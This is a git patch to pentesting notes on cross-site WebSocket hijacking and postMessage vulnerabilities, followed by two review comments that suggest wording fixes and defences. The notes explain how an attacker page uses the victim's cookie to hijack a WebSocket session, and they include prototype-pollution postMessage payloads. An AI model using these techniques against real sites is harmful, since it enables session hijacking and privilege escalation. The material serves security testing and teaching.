From adb4b651ca526c2d3f3b99f9ee698215bf7165e9 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 14 Nov 2021 22:56:00 +0000 Subject: [PATCH] GitBook: [#2843] upload send postmessage --- pentesting-web/cross-site-websocket-hijacking-cswsh.md | 6 +++--- pentesting-web/postmessage-vulnerabilities.md | 3 +++ 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md index 52f056f20..8721cdee0 100644 --- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md +++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md @@ -83,9 +83,7 @@ An attacker can create a **malicious web page** on their own domain which **esta ### Simple Attack -Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. - -Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.: +This attack allows you to make the client connect to websocket server and send some predefined value. ```markup ``` +Usually this will be useless as what you want is to get the information the real user is sending and the responses. + ### Stealing data from user Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code: diff --git a/pentesting-web/postmessage-vulnerabilities.md b/pentesting-web/postmessage-vulnerabilities.md index 55cbc702c..aea1de2b1 100644 --- a/pentesting-web/postmessage-vulnerabilities.md 
+++ b/pentesting-web/postmessage-vulnerabilities.md @@ -14,6 +14,9 @@ window.postMessage('{"__proto__":{"isAdmin":True}}', '*') document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*') +# postMessage to an iframe via onload +
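Review bot: in the `cross-site-websocket-hijacking-cswsh.md` hunk (`@@ -83,9 +83,7 @@`), the two removed paragraphs carried the only explanation of why the "Simple Attack" works at all: the browser attaches the victim's cookie to the cross-site WebSocket handshake, and the server binds the socket to that cookie, so a page on another origin inherits the victim's session. The one-line replacement ("This attack allows you to make the client connect to websocket server and send some predefined value.") drops that reasoning, and the `markup` fence beneath it is empty as shown, so a reader no longer sees either the mechanism or the "predefined value" being referred to. Suggest keeping a single sentence on the cookie/session binding, e.g. "Because the browser sends the victim's cookie with the handshake, the server treats the attacker's page as the logged-in user", and pairing it with the corresponding defence so the section stays actionable for both sides: validate the `Origin` header on the handshake and bind the socket to a per-session token rather than to the cookie alone. Two smaller points in the same hunk: "connect to websocket server" needs an article ("a WebSocket server"), and "Usually this will be useless" overstates it; "Usually this alone is of limited use, because the goal is the data the real user sends and the server's responses" says what the next section ("Stealing data from user") actually builds on.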
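Review bot: in the `postmessage-vulnerabilities.md` hunk (`@@ -14,6 +14,9 @@`), the added line `# postMessage to an iframe via onload` uses a `#` comment inside a snippet whose surrounding lines are JavaScript (`window.postMessage(...)`, `document.getElementById('idframe').contentWindow.postMessage(...)`), where `//` is the comment syntax, and the hunk ends right after the comment without the code it announces, so the heading points at nothing. Either add the example the comment describes or drop the comment until it does. The unchanged context lines also pass `'{"__proto__":{"isAdmin":True}}'`: `True` is not valid JSON (`true` is), so a receiver that does `JSON.parse(event.data)` will throw before any prototype-pollution test is exercised; fix the literal while touching this block. Since both calls use `'*'` as the target origin, it would also help readers testing their own handlers to state the check a safe receiver performs here: compare `event.origin` against an allow-list before parsing `event.data`.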